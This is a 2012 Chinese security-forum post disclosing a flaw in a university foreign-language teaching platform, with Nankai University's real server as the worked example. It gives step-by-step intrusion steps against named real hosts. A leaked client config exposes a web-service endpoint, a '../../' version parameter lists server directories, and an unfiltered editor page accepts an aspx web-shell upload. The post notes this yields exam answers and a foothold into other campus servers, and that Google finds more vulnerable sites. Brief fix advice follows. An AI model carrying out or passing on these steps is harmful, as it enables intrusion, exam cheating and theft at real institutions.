找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2162|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中+ q! E) ^4 S# T1 k; A& c
. F7 `% C2 s1 \# @+ K, G$ m
详细说明:
/ L0 C: i. f8 O0 r8 O! l
) L& v  T# o* l) n以南开大学的为例: # p- Q9 l* \4 S3 C( H
http://222.30.60.3/NPELS4 L/ N& E, A* M0 V& Y& t! d
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址2 q: r( |7 j1 c7 q9 h
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
) y' G* O% m. Q4 k<value>http://222.30.60.3/NPELS/CommonService.asmx</value>; |' ~3 z7 S# x" D4 l) O9 u* J  `
</setting>/ [1 S+ r  M: k% l/ o8 y
及版本号) S8 d3 t1 x& T
<add key="TVersion" value="1, 0, 0, 2187"># a# Y3 r" V8 G4 G/ b* _" h4 B
</add>
" U' S1 L) y4 V0 E9 R" F直接访问( D: V7 K& Y3 F3 h% g0 ]# t3 _% I
http://222.30.60.3/NPELS/CommonService.asmx) m  J% G8 J2 h1 k( C
使用GetTestClientFileList操作,直接 HTTP GET 列目录:0 l3 y6 {% N& I/ b, ?
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
" R& \, y1 I) T# z4 v  a. Y2 S进一步列目录(返回的网页很大,可以直接 wget 下来)
. ?2 }' j8 @# A+ W" Y1 F2 Chttp://222.30.60.3/NPELS/CommonS ... List?version=../..// @5 ~. k6 ~5 l3 W+ ], [
" _! R, O$ `5 T* I" K+ U8 d7 k/ {
发现! }* n# J! H, _' E
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm  G$ r/ \) c' F/ b2 A6 W
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头% s+ }8 O$ Y9 M1 Q
上传后继续列目录找到木马地址直接访问即可. I' Q" B: w5 [& Q5 s4 H' C& C
, A1 m) H) Y! k1 e, `8 l  R& W
OOXX
7 ^# f; V4 O* {' V 2 c/ q: Z" q2 k4 f
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
0 X2 e6 G( n5 @  I4 m漏洞证明:4 g5 a4 Y! N0 g8 ^/ l" a7 o
( m9 P& S: D% y, p3 u
列目录:
9 w$ B6 J7 E7 i: Z4 h$ Uhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
, p7 B3 R* s) P' |4 D! z; V( U文件上传:
6 z$ {3 ?+ e2 ]. ]% `, D5 \; D0 vhttp://222.30.60.3/npelsv/editor/editor.htm( B! W2 G% h* O# H: @
% _/ t) g% G' g+ [9 T
上传木马:
* P9 d! h3 D, q+ dhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
' e  G; \7 }  V9 [2 ^4 B/ ^- ]
$ d. o( N9 X- D8 q: a. E修复方案:: Z2 {) y: C, X7 s  `
好像考试系统必须使用 CommonService.asmx2 \. [2 l% W- N  N
最好配置文件加密或者用别的方式不让它泄露出来
5 A& J8 `2 C( p- ?( i! k并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
. a1 D$ c" Z: G0 Q+ l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表